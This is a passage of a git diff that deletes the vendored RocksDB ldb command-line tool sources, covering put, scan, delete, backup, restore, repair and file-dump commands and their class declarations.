-      key_values_.push_back(std::pair<std::string, std::string>(
-          is_key_hex_ ? HexToString(key) : key,
-          is_value_hex_ ? HexToString(value) : value));
-    }
-  }
-  create_if_missing_ = IsFlagPresent(flags_, ARG_CREATE_IF_MISSING);
-}
-
-void BatchPutCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(BatchPutCommand::Name());
-  ret.append(" <key> <value> [<key> <value>] [..]");
-  ret.append(" [--" + ARG_TTL + "]");
-  ret.append("\n");
-}
-
-void BatchPutCommand::DoCommand() {
-  if (!db_) {
-    assert(GetExecuteState().IsFailed());
-    return;
-  }
-  WriteBatch batch;
-
-  for (std::vector<std::pair<std::string, std::string>>::const_iterator itr =
-           key_values_.begin();
-       itr != key_values_.end(); ++itr) {
-    batch.Put(GetCfHandle(), itr->first, itr->second);
-  }
-  Status st = db_->Write(WriteOptions(), &batch);
-  if (st.ok()) {
-    fprintf(stdout, "OK\n");
-  } else {
-    exec_state_ = LDBCommandExecuteResult::Failed(st.ToString());
-  }
-}
-
-Options BatchPutCommand::PrepareOptionsForOpenDB() {
-  Options opt = LDBCommand::PrepareOptionsForOpenDB();
-  opt.create_if_missing = create_if_missing_;
-  return opt;
-}
-
-// ----------------------------------------------------------------------------
-
-ScanCommand::ScanCommand(const std::vector<std::string>& params,
-                         const std::map<std::string, std::string>& options,
-                         const std::vector<std::string>& flags)
-    : LDBCommand(
-          options, flags, true,
-          BuildCmdLineOptions({ARG_TTL, ARG_NO_VALUE, ARG_HEX, ARG_KEY_HEX,
-                               ARG_TO, ARG_VALUE_HEX, ARG_FROM, ARG_TIMESTAMP,
-                               ARG_MAX_KEYS, ARG_TTL_START, ARG_TTL_END})),
-      start_key_specified_(false),
-      end_key_specified_(false),
-      max_keys_scanned_(-1),
-      no_value_(false) {
-  std::map<std::string, std::string>::const_iterator itr =
-      options.find(ARG_FROM);
-  if (itr != options.end()) {
-    start_key_ = itr->second;
-    if (is_key_hex_) {
-      start_key_ = HexToString(start_key_);
-    }
-    start_key_specified_ = true;
-  }
-  itr = options.find(ARG_TO);
-  if (itr != options.end()) {
-    end_key_ = itr->second;
-    if (is_key_hex_) {
-      end_key_ = HexToString(end_key_);
-    }
-    end_key_specified_ = true;
-  }
-
-  std::vector<std::string>::const_iterator vitr =
-      std::find(flags.begin(), flags.end(), ARG_NO_VALUE);
-  if (vitr != flags.end()) {
-    no_value_ = true;
-  }
-
-  itr = options.find(ARG_MAX_KEYS);
-  if (itr != options.end()) {
-    try {
-#if defined(CYGWIN)
-      max_keys_scanned_ = strtol(itr->second.c_str(), 0, 10);
-#else
-      max_keys_scanned_ = std::stoi(itr->second);
-#endif
-    } catch (const std::invalid_argument&) {
-      exec_state_ = LDBCommandExecuteResult::Failed(ARG_MAX_KEYS +
-                                                    " has an invalid value");
-    } catch (const std::out_of_range&) {
-      exec_state_ = LDBCommandExecuteResult::Failed(
-          ARG_MAX_KEYS + " has a value out-of-range");
-    }
-  }
-}
-
-void ScanCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(ScanCommand::Name());
-  ret.append(HelpRangeCmdArgs());
-  ret.append(" [--" + ARG_TTL + "]");
-  ret.append(" [--" + ARG_TIMESTAMP + "]");
-  ret.append(" [--" + ARG_MAX_KEYS + "=<N>q] ");
-  ret.append(" [--" + ARG_TTL_START + "=<N>:- is inclusive]");
-  ret.append(" [--" + ARG_TTL_END + "=<N>:- is exclusive]");
-  ret.append(" [--" + ARG_NO_VALUE + "]");
-  ret.append("\n");
-}
-
-void ScanCommand::DoCommand() {
-  if (!db_) {
-    assert(GetExecuteState().IsFailed());
-    return;
-  }
-
-  int num_keys_scanned = 0;
-  Iterator* it = db_->NewIterator(ReadOptions(), GetCfHandle());
-  if (start_key_specified_) {
-    it->Seek(start_key_);
-  } else {
-    it->SeekToFirst();
-  }
-  int ttl_start;
-  if (!ParseIntOption(option_map_, ARG_TTL_START, ttl_start, exec_state_)) {
-    ttl_start = DBWithTTLImpl::kMinTimestamp;  // TTL introduction time
-  }
-  int ttl_end;
-  if (!ParseIntOption(option_map_, ARG_TTL_END, ttl_end, exec_state_)) {
-    ttl_end = DBWithTTLImpl::kMaxTimestamp;  // Max time allowed by TTL feature
-  }
-  if (ttl_end < ttl_start) {
-    fprintf(stderr, "Error: End time can't be less than start time\n");
-    delete it;
-    return;
-  }
-  if (is_db_ttl_ && timestamp_) {
-    fprintf(stdout, "Scanning key-values from %s to %s\n",
-            ReadableTime(ttl_start).c_str(), ReadableTime(ttl_end).c_str());
-  }
-  for ( ;
-        it->Valid() && (!end_key_specified_ || it->key().ToString() < end_key_);
-        it->Next()) {
-    if (is_db_ttl_) {
-      TtlIterator* it_ttl = static_cast_with_check<TtlIterator, Iterator>(it);
-      int rawtime = it_ttl->timestamp();
-      if (rawtime < ttl_start || rawtime >= ttl_end) {
-        continue;
-      }
-      if (timestamp_) {
-        fprintf(stdout, "%s ", ReadableTime(rawtime).c_str());
-      }
-    }
-
-    Slice key_slice = it->key();
-
-    std::string formatted_key;
-    if (is_key_hex_) {
-      formatted_key = "0x" + key_slice.ToString(true /* hex */);
-      key_slice = formatted_key;
-    } else if (ldb_options_.key_formatter) {
-      formatted_key = ldb_options_.key_formatter->Format(key_slice);
-      key_slice = formatted_key;
-    }
-
-    if (no_value_) {
-      fprintf(stdout, "%.*s\n", static_cast<int>(key_slice.size()),
-              key_slice.data());
-    } else {
-      Slice val_slice = it->value();
-      std::string formatted_value;
-      if (is_value_hex_) {
-        formatted_value = "0x" + val_slice.ToString(true /* hex */);
-        val_slice = formatted_value;
-      }
-      fprintf(stdout, "%.*s : %.*s\n", static_cast<int>(key_slice.size()),
-              key_slice.data(), static_cast<int>(val_slice.size()),
-              val_slice.data());
-    }
-
-    num_keys_scanned++;
-    if (max_keys_scanned_ >= 0 && num_keys_scanned >= max_keys_scanned_) {
-      break;
-    }
-  }
-  if (!it->status().ok()) {  // Check for any errors found during the scan
-    exec_state_ = LDBCommandExecuteResult::Failed(it->status().ToString());
-  }
-  delete it;
-}
-
-// ----------------------------------------------------------------------------
-
-DeleteCommand::DeleteCommand(const std::vector<std::string>& params,
-                             const std::map<std::string, std::string>& options,
-                             const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, false,
-                 BuildCmdLineOptions({ARG_HEX, ARG_KEY_HEX, ARG_VALUE_HEX})) {
-  if (params.size() != 1) {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        "KEY must be specified for the delete command");
-  } else {
-    key_ = params.at(0);
-    if (is_key_hex_) {
-      key_ = HexToString(key_);
-    }
-  }
-}
-
-void DeleteCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(DeleteCommand::Name() + " <key>");
-  ret.append("\n");
-}
-
-void DeleteCommand::DoCommand() {
-  if (!db_) {
-    assert(GetExecuteState().IsFailed());
-    return;
-  }
-  Status st = db_->Delete(WriteOptions(), GetCfHandle(), key_);
-  if (st.ok()) {
-    fprintf(stdout, "OK\n");
-  } else {
-    exec_state_ = LDBCommandExecuteResult::Failed(st.ToString());
-  }
-}
-
-DeleteRangeCommand::DeleteRangeCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, false,
-                 BuildCmdLineOptions({ARG_HEX, ARG_KEY_HEX, ARG_VALUE_HEX})) {
-  if (params.size() != 2) {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        "begin and end keys must be specified for the delete command");
-  } else {
-    begin_key_ = params.at(0);
-    end_key_ = params.at(1);
-    if (is_key_hex_) {
-      begin_key_ = HexToString(begin_key_);
-      end_key_ = HexToString(end_key_);
-    }
-  }
-}
-
-void DeleteRangeCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(DeleteRangeCommand::Name() + " <begin key> <end key>");
-  ret.append("\n");
-}
-
-void DeleteRangeCommand::DoCommand() {
-  if (!db_) {
-    assert(GetExecuteState().IsFailed());
-    return;
-  }
-  Status st =
-      db_->DeleteRange(WriteOptions(), GetCfHandle(), begin_key_, end_key_);
-  if (st.ok()) {
-    fprintf(stdout, "OK\n");
-  } else {
-    exec_state_ = LDBCommandExecuteResult::Failed(st.ToString());
-  }
-}
-
-PutCommand::PutCommand(const std::vector<std::string>& params,
-                       const std::map<std::string, std::string>& options,
-                       const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, false,
-                 BuildCmdLineOptions({ARG_TTL, ARG_HEX, ARG_KEY_HEX,
-                                      ARG_VALUE_HEX, ARG_CREATE_IF_MISSING})) {
-  if (params.size() != 2) {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        "<key> and <value> must be specified for the put command");
-  } else {
-    key_ = params.at(0);
-    value_ = params.at(1);
-  }
-
-  if (is_key_hex_) {
-    key_ = HexToString(key_);
-  }
-
-  if (is_value_hex_) {
-    value_ = HexToString(value_);
-  }
-  create_if_missing_ = IsFlagPresent(flags_, ARG_CREATE_IF_MISSING);
-}
-
-void PutCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(PutCommand::Name());
-  ret.append(" <key> <value> ");
-  ret.append(" [--" + ARG_TTL + "]");
-  ret.append("\n");
-}
-
-void PutCommand::DoCommand() {
-  if (!db_) {
-    assert(GetExecuteState().IsFailed());
-    return;
-  }
-  Status st = db_->Put(WriteOptions(), GetCfHandle(), key_, value_);
-  if (st.ok()) {
-    fprintf(stdout, "OK\n");
-  } else {
-    exec_state_ = LDBCommandExecuteResult::Failed(st.ToString());
-  }
-}
-
-Options PutCommand::PrepareOptionsForOpenDB() {
-  Options opt = LDBCommand::PrepareOptionsForOpenDB();
-  opt.create_if_missing = create_if_missing_;
-  return opt;
-}
-
-// ----------------------------------------------------------------------------
-
-const char* DBQuerierCommand::HELP_CMD = "help";
-const char* DBQuerierCommand::GET_CMD = "get";
-const char* DBQuerierCommand::PUT_CMD = "put";
-const char* DBQuerierCommand::DELETE_CMD = "delete";
-
-DBQuerierCommand::DBQuerierCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(
-          options, flags, false,
-          BuildCmdLineOptions({ARG_TTL, ARG_HEX, ARG_KEY_HEX, ARG_VALUE_HEX})) {
-
-}
-
-void DBQuerierCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(DBQuerierCommand::Name());
-  ret.append(" [--" + ARG_TTL + "]");
-  ret.append("\n");
-  ret.append("    Starts a REPL shell.  Type help for list of available "
-             "commands.");
-  ret.append("\n");
-}
-
-void DBQuerierCommand::DoCommand() {
-  if (!db_) {
-    assert(GetExecuteState().IsFailed());
-    return;
-  }
-
-  ReadOptions read_options;
-  WriteOptions write_options;
-
-  std::string line;
-  std::string key;
-  std::string value;
-  while (getline(std::cin, line, '\n')) {
-    // Parse line into std::vector<std::string>
-    std::vector<std::string> tokens;
-    size_t pos = 0;
-    while (true) {
-      size_t pos2 = line.find(' ', pos);
-      if (pos2 == std::string::npos) {
-        break;
-      }
-      tokens.push_back(line.substr(pos, pos2-pos));
-      pos = pos2 + 1;
-    }
-    tokens.push_back(line.substr(pos));
-
-    const std::string& cmd = tokens[0];
-
-    if (cmd == HELP_CMD) {
-      fprintf(stdout,
-              "get <key>\n"
-              "put <key> <value>\n"
-              "delete <key>\n");
-    } else if (cmd == DELETE_CMD && tokens.size() == 2) {
-      key = (is_key_hex_ ? HexToString(tokens[1]) : tokens[1]);
-      db_->Delete(write_options, GetCfHandle(), Slice(key));
-      fprintf(stdout, "Successfully deleted %s\n", tokens[1].c_str());
-    } else if (cmd == PUT_CMD && tokens.size() == 3) {
-      key = (is_key_hex_ ? HexToString(tokens[1]) : tokens[1]);
-      value = (is_value_hex_ ? HexToString(tokens[2]) : tokens[2]);
-      db_->Put(write_options, GetCfHandle(), Slice(key), Slice(value));
-      fprintf(stdout, "Successfully put %s %s\n",
-              tokens[1].c_str(), tokens[2].c_str());
-    } else if (cmd == GET_CMD && tokens.size() == 2) {
-      key = (is_key_hex_ ? HexToString(tokens[1]) : tokens[1]);
-      if (db_->Get(read_options, GetCfHandle(), Slice(key), &value).ok()) {
-        fprintf(stdout, "%s\n", PrintKeyValue(key, value,
-              is_key_hex_, is_value_hex_).c_str());
-      } else {
-        fprintf(stdout, "Not found %s\n", tokens[1].c_str());
-      }
-    } else {
-      fprintf(stdout, "Unknown command %s\n", line.c_str());
-    }
-  }
-}
-
-// ----------------------------------------------------------------------------
-
-CheckConsistencyCommand::CheckConsistencyCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, false, BuildCmdLineOptions({})) {}
-
-void CheckConsistencyCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(CheckConsistencyCommand::Name());
-  ret.append("\n");
-}
-
-void CheckConsistencyCommand::DoCommand() {
-  Options opt = PrepareOptionsForOpenDB();
-  opt.paranoid_checks = true;
-  if (!exec_state_.IsNotStarted()) {
-    return;
-  }
-  DB* db;
-  Status st = DB::OpenForReadOnly(opt, db_path_, &db, false);
-  delete db;
-  if (st.ok()) {
-    fprintf(stdout, "OK\n");
-  } else {
-    exec_state_ = LDBCommandExecuteResult::Failed(st.ToString());
-  }
-}
-
-// ----------------------------------------------------------------------------
-
-const std::string CheckPointCommand::ARG_CHECKPOINT_DIR = "checkpoint_dir";
-
-CheckPointCommand::CheckPointCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, false /* is_read_only */,
-                 BuildCmdLineOptions({ARG_CHECKPOINT_DIR})) {
-  auto itr = options.find(ARG_CHECKPOINT_DIR);
-  if (itr == options.end()) {
-    exec_state_ = LDBCommandExecuteResult::Failed(
-        "--" + ARG_CHECKPOINT_DIR + ": missing checkpoint directory");
-  } else {
-    checkpoint_dir_ = itr->second;
-  }
-}
-
-void CheckPointCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(CheckPointCommand::Name());
-  ret.append(" [--" + ARG_CHECKPOINT_DIR + "] ");
-  ret.append("\n");
-}
-
-void CheckPointCommand::DoCommand() {
-  if (!db_) {
-    assert(GetExecuteState().IsFailed());
-    return;
-  }
-  Checkpoint* checkpoint;
-  Status status = Checkpoint::Create(db_, &checkpoint);
-  status = checkpoint->CreateCheckpoint(checkpoint_dir_);
-  if (status.ok()) {
-    printf("OK\n");
-  } else {
-    exec_state_ = LDBCommandExecuteResult::Failed(status.ToString());
-  }
-}
-
-// ----------------------------------------------------------------------------
-
-RepairCommand::RepairCommand(const std::vector<std::string>& params,
-                             const std::map<std::string, std::string>& options,
-                             const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, false, BuildCmdLineOptions({})) {}
-
-void RepairCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(RepairCommand::Name());
-  ret.append("\n");
-}
-
-void RepairCommand::DoCommand() {
-  Options options = PrepareOptionsForOpenDB();
-  options.info_log.reset(new StderrLogger(InfoLogLevel::WARN_LEVEL));
-  Status status = RepairDB(db_path_, options);
-  if (status.ok()) {
-    printf("OK\n");
-  } else {
-    exec_state_ = LDBCommandExecuteResult::Failed(status.ToString());
-  }
-}
-
-// ----------------------------------------------------------------------------
-
-const std::string BackupableCommand::ARG_NUM_THREADS = "num_threads";
-const std::string BackupableCommand::ARG_BACKUP_ENV_URI = "backup_env_uri";
-const std::string BackupableCommand::ARG_BACKUP_DIR = "backup_dir";
-const std::string BackupableCommand::ARG_STDERR_LOG_LEVEL = "stderr_log_level";
-
-BackupableCommand::BackupableCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, false /* is_read_only */,
-                 BuildCmdLineOptions({ARG_BACKUP_ENV_URI, ARG_BACKUP_DIR,
-                                      ARG_NUM_THREADS, ARG_STDERR_LOG_LEVEL})),
-      num_threads_(1) {
-  auto itr = options.find(ARG_NUM_THREADS);
-  if (itr != options.end()) {
-    num_threads_ = std::stoi(itr->second);
-  }
-  itr = options.find(ARG_BACKUP_ENV_URI);
-  if (itr != options.end()) {
-    backup_env_uri_ = itr->second;
-  }
-  itr = options.find(ARG_BACKUP_DIR);
-  if (itr == options.end()) {
-    exec_state_ = LDBCommandExecuteResult::Failed("--" + ARG_BACKUP_DIR +
-                                                  ": missing backup directory");
-  } else {
-    backup_dir_ = itr->second;
-  }
-
-  itr = options.find(ARG_STDERR_LOG_LEVEL);
-  if (itr != options.end()) {
-    int stderr_log_level = std::stoi(itr->second);
-    if (stderr_log_level < 0 ||
-        stderr_log_level >= InfoLogLevel::NUM_INFO_LOG_LEVELS) {
-      exec_state_ = LDBCommandExecuteResult::Failed(
-          ARG_STDERR_LOG_LEVEL + " must be >= 0 and < " +
-          std::to_string(InfoLogLevel::NUM_INFO_LOG_LEVELS) + ".");
-    } else {
-      logger_.reset(
-          new StderrLogger(static_cast<InfoLogLevel>(stderr_log_level)));
-    }
-  }
-}
-
-void BackupableCommand::Help(const std::string& name, std::string& ret) {
-  ret.append("  ");
-  ret.append(name);
-  ret.append(" [--" + ARG_BACKUP_ENV_URI + "] ");
-  ret.append(" [--" + ARG_BACKUP_DIR + "] ");
-  ret.append(" [--" + ARG_NUM_THREADS + "] ");
-  ret.append(" [--" + ARG_STDERR_LOG_LEVEL + "=<int (InfoLogLevel)>] ");
-  ret.append("\n");
-}
-
-// ----------------------------------------------------------------------------
-
-BackupCommand::BackupCommand(const std::vector<std::string>& params,
-                             const std::map<std::string, std::string>& options,
-                             const std::vector<std::string>& flags)
-    : BackupableCommand(params, options, flags) {}
-
-void BackupCommand::Help(std::string& ret) {
-  BackupableCommand::Help(Name(), ret);
-}
-
-void BackupCommand::DoCommand() {
-  BackupEngine* backup_engine;
-  Status status;
-  if (!db_) {
-    assert(GetExecuteState().IsFailed());
-    return;
-  }
-  printf("open db OK\n");
-  std::unique_ptr<Env> custom_env_guard;
-  Env* custom_env = NewCustomObject<Env>(backup_env_uri_, &custom_env_guard);
-  BackupableDBOptions backup_options =
-      BackupableDBOptions(backup_dir_, custom_env);
-  backup_options.info_log = logger_.get();
-  backup_options.max_background_operations = num_threads_;
-  status = BackupEngine::Open(Env::Default(), backup_options, &backup_engine);
-  if (status.ok()) {
-    printf("open backup engine OK\n");
-  } else {
-    exec_state_ = LDBCommandExecuteResult::Failed(status.ToString());
-    return;
-  }
-  status = backup_engine->CreateNewBackup(db_);
-  if (status.ok()) {
-    printf("create new backup OK\n");
-  } else {
-    exec_state_ = LDBCommandExecuteResult::Failed(status.ToString());
-    return;
-  }
-}
-
-// ----------------------------------------------------------------------------
-
-RestoreCommand::RestoreCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : BackupableCommand(params, options, flags) {}
-
-void RestoreCommand::Help(std::string& ret) {
-  BackupableCommand::Help(Name(), ret);
-}
-
-void RestoreCommand::DoCommand() {
-  std::unique_ptr<Env> custom_env_guard;
-  Env* custom_env = NewCustomObject<Env>(backup_env_uri_, &custom_env_guard);
-  std::unique_ptr<BackupEngineReadOnly> restore_engine;
-  Status status;
-  {
-    BackupableDBOptions opts(backup_dir_, custom_env);
-    opts.info_log = logger_.get();
-    opts.max_background_operations = num_threads_;
-    BackupEngineReadOnly* raw_restore_engine_ptr;
-    status = BackupEngineReadOnly::Open(Env::Default(), opts,
-                                        &raw_restore_engine_ptr);
-    if (status.ok()) {
-      restore_engine.reset(raw_restore_engine_ptr);
-    }
-  }
-  if (status.ok()) {
-    printf("open restore engine OK\n");
-    status = restore_engine->RestoreDBFromLatestBackup(db_path_, db_path_);
-  }
-  if (status.ok()) {
-    printf("restore from backup OK\n");
-  } else {
-    exec_state_ = LDBCommandExecuteResult::Failed(status.ToString());
-  }
-}
-
-// ----------------------------------------------------------------------------
-
-namespace {
-
-void DumpSstFile(std::string filename, bool output_hex, bool show_properties) {
-  std::string from_key;
-  std::string to_key;
-  if (filename.length() <= 4 ||
-      filename.rfind(".sst") != filename.length() - 4) {
-    std::cout << "Invalid sst file name." << std::endl;
-    return;
-  }
-  // no verification
-  rocksdb::SstFileReader reader(filename, false, output_hex);
-  Status st = reader.ReadSequential(true, -1, false,  // has_from
-                                    from_key, false,  // has_to
-                                    to_key);
-  if (!st.ok()) {
-    std::cerr << "Error in reading SST file " << filename << st.ToString()
-              << std::endl;
-    return;
-  }
-
-  if (show_properties) {
-    const rocksdb::TableProperties* table_properties;
-
-    std::shared_ptr<const rocksdb::TableProperties>
-        table_properties_from_reader;
-    st = reader.ReadTableProperties(&table_properties_from_reader);
-    if (!st.ok()) {
-      std::cerr << filename << ": " << st.ToString()
-                << ". Try to use initial table properties" << std::endl;
-      table_properties = reader.GetInitTableProperties();
-    } else {
-      table_properties = table_properties_from_reader.get();
-    }
-    if (table_properties != nullptr) {
-      std::cout << std::endl << "Table Properties:" << std::endl;
-      std::cout << table_properties->ToString("\n") << std::endl;
-      std::cout << "# deleted keys: "
-                << rocksdb::GetDeletedKeys(
-                       table_properties->user_collected_properties)
-                << std::endl;
-    }
-  }
-}
-
-}  // namespace
-
-DBFileDumperCommand::DBFileDumperCommand(
-    const std::vector<std::string>& params,
-    const std::map<std::string, std::string>& options,
-    const std::vector<std::string>& flags)
-    : LDBCommand(options, flags, true, BuildCmdLineOptions({})) {}
-
-void DBFileDumperCommand::Help(std::string& ret) {
-  ret.append("  ");
-  ret.append(DBFileDumperCommand::Name());
-  ret.append("\n");
-}
-
-void DBFileDumperCommand::DoCommand() {
-  if (!db_) {
-    assert(GetExecuteState().IsFailed());
-    return;
-  }
-  Status s;
-
-  std::cout << "Manifest File" << std::endl;
-  std::cout << "==============================" << std::endl;
-  std::string manifest_filename;
-  s = ReadFileToString(db_->GetEnv(), CurrentFileName(db_->GetName()),
-                       &manifest_filename);
-  if (!s.ok() || manifest_filename.empty() ||
-      manifest_filename.back() != '\n') {
-    std::cerr << "Error when reading CURRENT file "
-              << CurrentFileName(db_->GetName()) << std::endl;
-  }
-  // remove the trailing '\n'
-  manifest_filename.resize(manifest_filename.size() - 1);
-  std::string manifest_filepath = db_->GetName() + "/" + manifest_filename;
-  std::cout << manifest_filepath << std::endl;
-  DumpManifestFile(manifest_filepath, false, false, false);
-  std::cout << std::endl;
-
-  std::cout << "SST Files" << std::endl;
-  std::cout << "==============================" << std::endl;
-  std::vector<LiveFileMetaData> metadata;
-  db_->GetLiveFilesMetaData(&metadata);
-  for (auto& fileMetadata : metadata) {
-    std::string filename = fileMetadata.db_path + fileMetadata.name;
-    std::cout << filename << " level:" << fileMetadata.level << std::endl;
-    std::cout << "------------------------------" << std::endl;
-    DumpSstFile(filename, false, true);
-    std::cout << std::endl;
-  }
-  std::cout << std::endl;
-
-  std::cout << "Write Ahead Log Files" << std::endl;
-  std::cout << "==============================" << std::endl;
-  rocksdb::VectorLogPtr wal_files;
-  s = db_->GetSortedWalFiles(wal_files);
-  if (!s.ok()) {
-    std::cerr << "Error when getting WAL files" << std::endl;
-  } else {
-    for (auto& wal : wal_files) {
-      // TODO(qyang): option.wal_dir should be passed into ldb command
-      std::string filename = db_->GetOptions().wal_dir + wal->PathName();
-      std::cout << filename << std::endl;
-      DumpWalFile(filename, true, true, &exec_state_);
-    }
-  }
-}
-
-}   // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/tools/ldb_cmd_impl.h b/thirdparty/rocksdb/tools/ldb_cmd_impl.h
deleted file mode 100644
index 91afd26..0000000
--- a/thirdparty/rocksdb/tools/ldb_cmd_impl.h
+++ /dev/null
@@ -1,523 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include "rocksdb/utilities/ldb_cmd.h"
-
-#include <map>
-#include <string>
-#include <utility>
-#include <vector>
-
-namespace rocksdb {
-
-class CompactorCommand : public LDBCommand {
- public:
-  static std::string Name() { return "compact"; }
-
-  CompactorCommand(const std::vector<std::string>& params,
-                   const std::map<std::string, std::string>& options,
-                   const std::vector<std::string>& flags);
-
-  static void Help(std::string& ret);
-
-  virtual void DoCommand() override;
-
- private:
-  bool null_from_;
-  std::string from_;
-  bool null_to_;
-  std::string to_;
-};
-
-class DBFileDumperCommand : public LDBCommand {
- public:
-  static std::string Name() { return "dump_live_files"; }
-
-  DBFileDumperCommand(const std::vector<std::string>& params,
-                      const std::map<std::string, std::string>& options,
-                      const std::vector<std::string>& flags);
-
-  static void Help(std::string& ret);
-
-  virtual void DoCommand() override;
-};
-
-class DBDumperCommand : public LDBCommand {
- public:
-  static std::string Name() { return "dump"; }
-
-  DBDumperCommand(const std::vector<std::string>& params,
-                  const std::map<std::string, std::string>& options,
-                  const std::vector<std::string>& flags);
-
-  static void Help(std::string& ret);
-
-  virtual void DoCommand() override;
-
- private:
-  /**
-   * Extract file name from the full path. We handle both the forward slash (/)
-   * and backslash (\) to make sure that different OS-s are supported.
-  */
-  static std::string GetFileNameFromPath(const std::string& s) {
-    std::size_t n = s.find_last_of("/\\");
-
-    if (std::string::npos == n) {
-      return s;
-    } else {
-      return s.substr(n + 1);
-    }
-  }
-
-  void DoDumpCommand();
-
-  bool null_from_;
-  std::string from_;
-  bool null_to_;
-  std::string to_;
-  int max_keys_;
-  std::string delim_;
-  bool count_only_;
-  bool count_delim_;
-  bool print_stats_;
-  std::string path_;
-
-  static const std::string ARG_COUNT_ONLY;
-  static const std::string ARG_COUNT_DELIM;
-  static const std::string ARG_STATS;
-  static const std::string ARG_TTL_BUCKET;
-};
-
-class InternalDumpCommand : public LDBCommand {
- public:
-  static std::string Name() { return "idump"; }
-
-  InternalDumpCommand(const std::vector<std::string>& params,
-                      const std::map<std::string, std::string>& options,
-                      const std::vector<std::string>& flags);
-
-  static void Help(std::string& ret);
-
-  virtual void DoCommand() override;
-
- private:
-  bool has_from_;
-  std::string from_;
-  bool has_to_;
-  std::string to_;
-  int max_keys_;
-  std::string delim_;
-  bool count_only_;
-  bool count_delim_;
-  bool print_stats_;
-  bool is_input_key_hex_;
-
-  static const std::string ARG_DELIM;
-  static const std::string ARG_COUNT_ONLY;
-  static const std::string ARG_COUNT_DELIM;
-  static const std::string ARG_STATS;
-  static const std::string ARG_INPUT_KEY_HEX;
-};
-
-class DBLoaderCommand : public LDBCommand {
- public:
-  static std::string Name() { return "load"; }
-
-  DBLoaderCommand(std::string& db_name, std::vector<std::string>& args);
-
-  DBLoaderCommand(const std::vector<std::string>& params,
-                  const std::map<std::string, std::string>& options,
-                  const std::vector<std::string>& flags);
-
-  static void Help(std::string& ret);
-  virtual void DoCommand() override;
-
-  virtual Options PrepareOptionsForOpenDB() override;
-
- private:
-  bool disable_wal_;
-  bool bulk_load_;
-  bool compact_;
-
-  static const std::string ARG_DISABLE_WAL;
-  static const std::string ARG_BULK_LOAD;
-  static const std::string ARG_COMPACT;
-};
-
-class ManifestDumpCommand : public LDBCommand {
- public:
-  static std::string Name() { return "manifest_dump"; }
-
-  ManifestDumpCommand(const std::vector<std::string>& params,
-                      const std::map<std::string, std::string>& options,
-                      const std::vector<std::string>& flags);
-
-  static void Help(std::string& ret);
-  virtual void DoCommand() override;
-
-  virtual bool NoDBOpen() override { return true; }
-
- private:
-  bool verbose_;
-  bool json_;
-  std::string path_;
-
-  static const std::string ARG_VERBOSE;
-  static const std::string ARG_JSON;
-  static const std::string ARG_PATH;
-};
-
-class ListColumnFamiliesCommand : public LDBCommand {
- public:
-  static std::string Name() { return "list_column_families"; }
-
-  ListColumnFamiliesCommand(const std::vector<std::string>& params,
-                            const std::map<std::string, std::string>& options,
-                            const std::vector<std::string>& flags);
-
-  static void Help(std::string& ret);
-  virtual void DoCommand() override;
-
-  virtual bool NoDBOpen() override { return true; }
-
- private:
-  std::string dbname_;
-};
-
-class CreateColumnFamilyCommand : public LDBCommand {
- public:
-  static std::string Name() { return "create_column_family"; }
-
-  CreateColumnFamilyCommand(const std::vector<std::string>& params,
-                            const std::map<std::string, std::string>& options,
-                            const std::vector<std::string>& flags);
-
-  static void Help(std::string& ret);
-  virtual void DoCommand() override;
-
-  virtual bool NoDBOpen() override { return false; }
-
- private:
-  std::string new_cf_name_;
-};
-
-class ReduceDBLevelsCommand : public LDBCommand {
- public:
-  static std::string Name() { return "reduce_levels"; }
-
-  ReduceDBLevelsCommand(const std::vector<std::string>& params,
-                        const std::map<std::string, std::string>& options,
-                        const std::vector<std::string>& flags);
-
-  virtual Options PrepareOptionsForOpenDB() override;
-
-  virtual void DoCommand() override;
-
-  virtual bool NoDBOpen() override { return true; }
-
-  static void Help(std::string& msg);
-
-  static std::vector<std::string> PrepareArgs(const std::string& db_path,
-                                              int new_levels,
-                                              bool print_old_level = false);
-
- private:
-  int old_levels_;
-  int new_levels_;
-  bool print_old_levels_;
-
-  static const std::string ARG_NEW_LEVELS;
-  static const std::string ARG_PRINT_OLD_LEVELS;
-
-  Status GetOldNumOfLevels(Options& opt, int* levels);
-};
-
-class ChangeCompactionStyleCommand : public LDBCommand {
- public:
-  static std::string Name() { return "change_compaction_style"; }
-
-  ChangeCompactionStyleCommand(
-      const std::vector<std::string>& params,
-      const std::map<std::string, std::string>& options,
-      const std::vector<std::string>& flags);
-
-  virtual Options PrepareOptionsForOpenDB() override;
-
-  virtual void DoCommand() override;
-
-  static void Help(std::string& msg);
-
- private:
-  int old_compaction_style_;
-  int new_compaction_style_;
-
-  static const std::string ARG_OLD_COMPACTION_STYLE;
